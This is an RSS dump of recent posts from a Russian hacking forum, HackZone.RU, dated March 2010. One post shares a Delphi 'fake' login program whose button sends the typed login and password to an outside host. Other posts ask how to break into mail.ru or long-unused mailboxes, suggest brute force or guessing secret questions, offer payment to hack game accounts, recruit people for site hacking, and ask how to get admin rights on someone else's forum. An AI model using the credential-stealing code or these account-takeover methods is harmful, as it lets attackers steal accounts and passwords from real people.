http://www.hackzone.ru/ HackZone.RU - Территория взлома Thu, 18 Mar 2010 17:13:14 +0300 15 ru http://www.hackzone.ru/forum/open/id/11849/#47834 http://www.hackzone.ru/forum/open/id/11849/#47834 Thu, 18 Mar 2010 17:13:13 +0300 Тебя забанили в гугле? http://is.gd/aNlJL http://www.hackzone.ru/forum/open/id/11860/#47833 http://www.hackzone.ru/forum/open/id/11860/#47833 Thu, 18 Mar 2010 17:11:18 +0300 [quote][b]Fantomas:[/b] Есть по этой теме статьи?[/quote] Статей такая-то туча, go http://www.hackzone.ru/articles Ищешь. [quote][b]Fantomas:[/b] Это сложно?[/quote] Зависит от наличия мозга. http://www.hackzone.ru/forum/open/id/11860/#47832 http://www.hackzone.ru/forum/open/id/11860/#47832 Thu, 18 Mar 2010 17:08:55 +0300 [quote][b]Fantomas:[/b] Это сложно?[/quote] кому как, зависит от глубины твоих знаний. [quote][b]Fantomas:[/b] Есть по этой теме статьи?[/quote] О уязвомостях море статей. Но естественно там же не расписано как именно взломать mail.ru http://www.hackzone.ru/forum/open/id/11860/#47831 http://www.hackzone.ru/forum/open/id/11860/#47831 Thu, 18 Mar 2010 16:54:57 +0300 [quote][b]Bb0y:[/b] Найти уязвимость на почтовом сервисе типа sql/php injection[/quote] Это сложно?Есть по этой теме статьи? http://www.hackzone.ru/forum/open/id/11842/#47830 http://www.hackzone.ru/forum/open/id/11842/#47830 Thu, 18 Mar 2010 16:39:44 +0300 1. Вполне возможно, что сканнер ошибся/дал не точные результаты 2. Php include aka php injection aka lfi/rfi или по твоему инжект 3. Зачем тогда приводил этот скрипт? 4. Имена файлов могут быть сменены, как и содержимое скриптов http://www.hackzone.ru/forum/open/id/11860/#47829 http://www.hackzone.ru/forum/open/id/11860/#47829 Thu, 18 Mar 2010 16:35:46 +0300 Найти уязвимость на почтовом сервисе типа sql/php injection http://www.hackzone.ru/forum/open/id/11857/#47820 http://www.hackzone.ru/forum/open/id/11857/#47820 Thu, 18 Mar 2010 14:45:11 +0300 Написал фейк на дельфи.Всё работало , но в один прекрасный момент начало выдавать ошибку: '<html>'.Чё за хрень? Вот код: [code]unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, StdCtrls; type TForm1 = class(TForm) Edit1: TEdit; Edit2: TEdit; Button1: TButton; IdHTTP1: TIdHTTP; Edit3: TEdit; Label1: TLabel; procedure Button1Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} procedure TForm1.Button1Click(Sender: TObject); begin idhttp1.Get('http://httpz.ru/nurxoygs448.gif?''Login:'+edit1.text); idhttp1.Get('http://httpz.ru/nurxoygs448.gif?''Password:'+edit2.text); Label1.Font.Color:=clRed; Label1.Caption:='&#196;&#237;&#229;&#226;&#237;&#238;&#233; &#235;&#232;&#236;&#232;&#242; &#232;&#241;&#249;&#229;&#240;&#239;&#224;&#237;!'; end; end.[/code] http://www.hackzone.ru/forum/open/id/11860/#47827 http://www.hackzone.ru/forum/open/id/11860/#47827 Thu, 18 Mar 2010 15:43:11 +0300 Есть ещё способы? http://www.hackzone.ru/forum/open/id/11860/#47826 http://www.hackzone.ru/forum/open/id/11860/#47826 Thu, 18 Mar 2010 15:38:25 +0300 Можно брутом. Еще как вариант ответить на секретный вопрос. http://www.hackzone.ru/forum/open/id/11860/#47825 http://www.hackzone.ru/forum/open/id/11860/#47825 Thu, 18 Mar 2010 15:28:05 +0300 Как взломать давно забытый ящик или когда на него не заходят? http://www.hackzone.ru/forum/open/id/11858/#47823 http://www.hackzone.ru/forum/open/id/11858/#47823 Thu, 18 Mar 2010 15:08:36 +0300 подскажите как взламывать персонажей,или взломайте мне персонажа а я вам заплачу....можете писать в асю 373125084 http://www.hackzone.ru/forum/open/id/11849/#47822 http://www.hackzone.ru/forum/open/id/11849/#47822 Thu, 18 Mar 2010 14:57:33 +0300 Через The Bat не знаю, но здесь можно анонимно: [url]http://bogomol.net/incom/[/url] http://www.hackzone.ru/forum/open/id/11842/#47821 http://www.hackzone.ru/forum/open/id/11842/#47821 Thu, 18 Mar 2010 14:53:15 +0300 [quote][b]Bb0y:[/b] [/quote] 1. Сканер - xspider 2. Не знаю что это? 3. Я собственно, так и делал) 4. Там движок на WP. http://www.hackzone.ru/forum/open/id/11856/#47819 http://www.hackzone.ru/forum/open/id/11856/#47819 Thu, 18 Mar 2010 14:23:56 +0300 Добрый день. Нужен человек с навыками взлома сайтов желающий работать в команде. Все нюансы обсудим при разговоре. ася 575410517 Адекватность гарантирую. http://www.hackzone.ru/forum/open/id/11854/#47818 http://www.hackzone.ru/forum/open/id/11854/#47818 Thu, 18 Mar 2010 14:09:11 +0300 После удаления сообщения нередко следует предупреждение или бан. Если модератор оказался так добр что второе не прибавил и тем самым не понизил рейтинг то нужно благодарить а не возникать. З,Ы: Как не прискорбно еще раз убеждаюсь в том что по хорошему почти никто не понимает. http://www.hackzone.ru/forum/open/id/11851/#47817 http://www.hackzone.ru/forum/open/id/11851/#47817 Thu, 18 Mar 2010 14:04:35 +0300 Ищи подраздел exefile и в нем command по умолчанию "%1" %* Если так и есть то ОК. http://www.hackzone.ru/forum/open/id/11855/#47815 http://www.hackzone.ru/forum/open/id/11855/#47815 Thu, 18 Mar 2010 13:23:49 +0300 коротко о проблеме: есть хороший сайт, называется [b][CUTTED][/b] на нем есть форум. так вот, недавно этот форум или весь сайт взломали, и убрали все права админов и модераторов. после взлома, хостинг и домен был проплачен и сайт работает...но...контакта с хозяевами сайта, посетители форума найти не могут. ну вообщем форум функционирует, да и ладно, общайтесь на здоровье...но недавно появилась другая проблема. Появился пользователь, который попросту засирает весь форум, бессмысленным флудом и матами, вследствии чего, общаться на форуме невозможно. от сюда вопрос, даже не вопрос а [b]просьба - помогите навести порядок на форуме[/b]. а именно: редактировать сообщения других участников я научился, но это не помогает, [b]хочется научиться удалять посты...а еще лучше научиться блокировать или удалять пользователя. [/b] Глобального взлома всего сайта не требуется (хотя не помешало бы), а лишь хочется иметь возможности "модерировать" форум, хоть какими то способами, дабы сохранить форум и всех адекватных пользователей, пока не появятся хозяева сайта. сам я лишь поверхностно знаю HTML, поэтому прошу вашей помощи. войти в админку можно под любым зарегеным пользователем, но там ничего нет...может как то можно получить доступ к функциям админа? отредактировать чужое сообщение можно легко, просто заменив id мессаги.... а вот с удалением, поста чужего пользователя, не прокатывает. [b]удаление поста, происходит скриптом:[/b] вот команда javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("ctl00$ContentPlaceHolder1$RepeatMessages$ctl01$ButtonDel", "", true, "", "", false, true)) [code] RepeatMessages$ctl[b]01[/b] - это порядковый номер удалямого поста, если запустить скрипт с адресной строки, то можно удалять свои посты, меняя номер поста, а если указать номер поста другого пользователя, то выдает ошибку. Во время выполнения текущего запроса произошла ошибка. Сообщение об ошибке было направлено администратору. Вернитесь на предыдущую страницу и обновите окно. не могу понять как происходит авторизация на форуме... вот данные которые отправляются при авторизации: POST http://site.ru/index.aspx HTTP/1.0 User-Agent: Opera/9.22 (Windows NT 5.1; U; ru) Host: site.ru Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://site.ru/index.aspx Cookie: ASP.NET_SessionId=xzfux345nebjf4i3wiqzyv45; IT_STUDIO=Login=&Password=&RememberMe=OFF; MG_819=8; MG_4903=9; rtn4p=4 Cookie2: $Version=1 Proxy-Connection: close Content-Length: 2038 Content-Type: application/x-www-form-urlencoded __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTc4MDQyOTk1OQ9kFgJmD2QWAgIDD2QWBgIBD2QWBGYPZBYCAgEPFgIeC18hSXRlbUNvdW50AgMWBmYPZBYCZg8VAgQzMzUzNdCa0LDQuiDQvtGC0LvQuNGH0LjRgtGMINC90LDRgdGC0L7Rj9GJ0LXQs9C%2BINCz0YPRgNGDZAIBD2QWAmYPFQIEMzIxNynQndC1INC%2F0L7RgtC10YDRj9C5INGA0L7QtNC90YPRjiDQtNGD0YjRg2QCAg9kFgJmDxUCBDMyMzIw0JLRgNC10LzQtdC90L3QsNGPINC%2F0LXRgtC70Y8g0L3QtdCy0LjQtNC40LzQutC4ZAIBD2QWBGYPD2QWAh4Hb25mb2N1cwVQamF2YXNjcmlwdDpkb0xvZ2luQnV0RGVmKHRoaXMpOyBpZiAodGhpcy52YWx1ZSA9PSAn0LvQvtCz0LjQvScpIHRoaXMudmFsdWUgPSAnJztkAgEPD2QWAh8BBVJqYXZhc2NyaXB0OmRvTG9naW5CdXREZWYodGhpcyk7IGlmICh0aGlzLnZhbHVlID09ICfQv9Cw0YDQvtC70YwnKSB0aGlzLnZhbHVlID0gJyc7ZAIDD2QWBGYPZBYCZg8PZBYCHwEFYGphdmFzY3JpcHQ6ZG9TZWFyY2hCdXREZWYodGhpcyk7aWYgKHRoaXMudmFsdWUgPT0gJ9C%2F0L7QuNGB0Log0L%2FQviDRgdCw0LnRgtGDJykgdGhpcy52YWx1ZSA9ICcnO2QCBQ8PFgQeB1F1ZXN0SUQC9gEeDUNvbW1lbnRzQ291bnQC%2BQJkFgpmDw8WAh4EVGV4dAV60KXQvtGC0LXQu9C4INCx0Ysg0JLRiyDQstGB0YLRgNC10YLQuNGC0YzRgdGPINGBINC%2F0YDQtdC00YHRgtCw0LLQuNGC0LXQu9GP0LzQuCDQstC90LXQt9C10LzQvdGL0YUg0YbQuNCy0LjQu9C40LfQsNGG0LjQuT9kZAIBDxYCHgdWaXNpYmxlaBYCZg9kFgICAw8QZGQWAGQCAg8WAh8FZxYCZg9kFgICAQ8WAh8AAgQWCAIBD2QWAmYPFQQa0JTQsCwg0Y8g0L3QtSDQv9GA0L7RgtC40LICNzAFNzAsMjcENTI2OGQCAg9kFgJmDxUELdCvINCy0YHRgtGA0LXRh9Cw0LvRgdGPKC3QsNGB0YwpICDRgSDQvdC40LzQuAE2BDYsNzkDNTA5ZAIDD2QWAmYPFQQi0J3QtdGCLCDQvdC1INGF0L7RgtC10LvQvtGB0Ywg0LHRiwIxNwUxNyw2MgQxMzIxZAIED2QWAmYPFQQz0K8g0L3QtSDQstC10YDRjiDQsiDQuNGFINGB0YPRidC10YHRgtCy0L7QstCw0L3QuNC1ATUENSwzMgMzOTlkAgMPDxYCHwQFBDc0OTdkZAIEDw8WAh8FaGRkAgUPZBYCAgIPZBYCAgEPD2QWAh8BBT9qYXZhc2NyaXB0OiBpZiAodGhpcy52YWx1ZSA9PSAn0LLQsNGIIGUtbWFpbCcpIHRoaXMudmFsdWUgPSAnJztkZFGXUHTCxywKeALMW3h79P1CwjPv&__EVENTVALIDATION=%2FwEWCALluryLAgK4ocnhCwLd8Z2jDQKrh8ulCQLfr9iXDAKj7%2Bn0DQL%2FouRFApa8u%2F4IpKaMkQ6h0US5TMBLrXEp1ixiLXo%3D&ctl00%24header%24ctl01%24txtLogin=koon10&ctl00%24header%24ctl01%24txtPassword=12345&ctl00%24header%24ctl01%24btnSubmit=%E2%F5%EE%E4&ctl00%24left%24ctl00%24txtSearch=%EF%EE%E8%F1%EA+%EF%EE+%F1%E0%E9%F2%F3&ctl00%24right%24ctl01%24txtSubsriber=%E2%E0%F8+e-mail [/code] в коде страницы есть скрытые формы: [code] <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTc4MDQyOTk1OQ9kFgJmD2QWAgIDD2QWBgIBD2QWBGYPZBYCAgEPFgIeC18hSXRlbUNvdW50AgMWBmYPZBYCZg8VAgQzMzUzNdCa0LDQuiDQvtGC0LvQuNGH0LjRgtGMINC90LDRgdGC0L7Rj9GJ0LXQs9C+INCz0YPRgNGDZAIBD2QWAmYPFQIEMzIxNynQndC1INC/0L7RgtC10YDRj9C5INGA0L7QtNC90YPRjiDQtNGD0YjRg2QCAg9kFgJmDxUCBDMyMzIw0JLRgNC10LzQtdC90L3QsNGPINC/0LXRgtC70Y8g0L3QtdCy0LjQtNC40LzQutC4ZAIBD2QWBGYPD2QWAh4Hb25mb2N1cwVQamF2YXNjcmlwdDpkb0xvZ2luQnV0RGVmKHRoaXMpOyBpZiAodGhpcy52YWx1ZSA9PSAn0LvQvtCz0LjQvScpIHRoaXMudmFsdWUgPSAnJztkAgEPD2QWAh8BBVJqYXZhc2NyaXB0OmRvTG9naW5CdXREZWYodGhpcyk7IGlmICh0aGlzLnZhbHVlID09ICfQv9Cw0YDQvtC70YwnKSB0aGlzLnZhbHVlID0gJyc7ZAIDD2QWBGYPZBYCZg8PZBYCHwEFYGphdmFzY3JpcHQ6ZG9TZWFyY2hCdXREZWYodGhpcyk7aWYgKHRoaXMudmFsdWUgPT0gJ9C/0L7QuNGB0Log0L/QviDRgdCw0LnRgtGDJykgdGhpcy52YWx1ZSA9ICcnO2QCBQ8PFgQeB1F1ZXN0SUQC9gEeDUNvbW1lbnRzQ291bnQC+QJkFgpmDw8WAh4EVGV4dAV60KXQvtGC0LXQu9C4INCx0Ysg0JLRiyDQstGB0YLRgNC10YLQuNGC0YzRgdGPINGBINC/0YDQtdC00YHRgtCw0LLQuNGC0LXQu9GP0LzQuCDQstC90LXQt9C10LzQvdGL0YUg0YbQuNCy0LjQu9C40LfQsNGG0LjQuT9kZAIBDxYCHgdWaXNpYmxlaBYCZg9kFgICAw8QZGQWAGQCAg8WAh8FZxYCZg9kFgICAQ8WAh8AAgQWCAIBD2QWAmYPFQQa0JTQsCwg0Y8g0L3QtSDQv9GA0L7RgtC40LICNzAFNzAsMjcENTI2OGQCAg9kFgJmDxUELdCvINCy0YHRgtGA0LXRh9Cw0LvRgdGPKC3QsNGB0YwpICDRgSDQvdC40LzQuAE2BDYsNzkDNTA5ZAIDD2QWAmYPFQQi0J3QtdGCLCDQvdC1INGF0L7RgtC10LvQvtGB0Ywg0LHRiwIxNwUxNyw2MgQxMzIxZAIED2QWAmYPFQQz0K8g0L3QtSDQstC10YDRjiDQsiDQuNGFINGB0YPRidC10YHRgtCy0L7QstCw0L3QuNC1ATUENSwzMgMzOTlkAgMPDxYCHwQFBDc0OTdkZAIEDw8WAh8FaGRkAgUPZBYCAgIPZBYCAgEPD2QWAh8BBT9qYXZhc2NyaXB0OiBpZiAodGhpcy52YWx1ZSA9PSAn0LLQsNGIIGUtbWFpbCcpIHRoaXMudmFsdWUgPSAnJztkZFGXUHTCxywKeALMW3h79P1CwjPv" /> </div> [/code] какую роль они выполняют?может через них можно что то сделать? вообщем вот..помогите, кто чем сможет=))) ЗЫ. заранее всем спасибо! надеюсь поможете сохранить форум... http://www.hackzone.ru/forum/open/id/11854/#47816 http://www.hackzone.ru/forum/open/id/11854/#47816 Thu, 18 Mar 2010 13:29:55 +0300 Вполне возможно что твое сообщение либо было оформлено не по правилам, либо что-либо нарушало, читай правила оформления постов. http://www.hackzone.ru/forum/open/id/11851/#47814 http://www.hackzone.ru/forum/open/id/11851/#47814 Thu, 18 Mar 2010 11:57:14 +0300 понял в чем дело. в любом ехе файле захожу свойства>тип файла: [b]файл <<EXE>>(.EXE)[/b] - когда должно стоять [b]ПРИЛОЖЕНИЕ (EXE)[/b] Захожу в сопоставление типов файлов, там нет типа exe, когда раньше всегда стоял. Как теперь задать это сопоставление? чтоб нормально запускалось [i][b]Добавлено через: 1 час 51 минута 30 секунд [/b][/i] пытался сделать regedit пишет что некоторые разделы заняты системой или другими процессами http://www.hackzone.ru/forum/open/id/11854/#47813 http://www.hackzone.ru/forum/open/id/11854/#47813 Thu, 18 Mar 2010 11:29:09 +0300 Модераторы почему вы удаляете сообщения, которые без мата и вского рода предложений. В онлай игре в с++ я интересовался, сейчас не помню чем, а вы взяли и удаляли сообщения. ля чего нужен форум, чтобы спрашивать, а не чтоб вы все сообщения фильтровали. Вы помойму забыли для чего тут, чтоб небыло флуда и мата, а не удалять те сообщения, которые вам кажуться глупы. Я пока начинаю разбираться и вам может показаться , ччто вопросы глупы, но мне они не понятны. И я сомневаюсь, что вы сами стали вот так просто во всём разбираться, тоже так же задавали вопросы и разбирались. Вообщем моя просьба в том, чтоб сообшения не удаляли.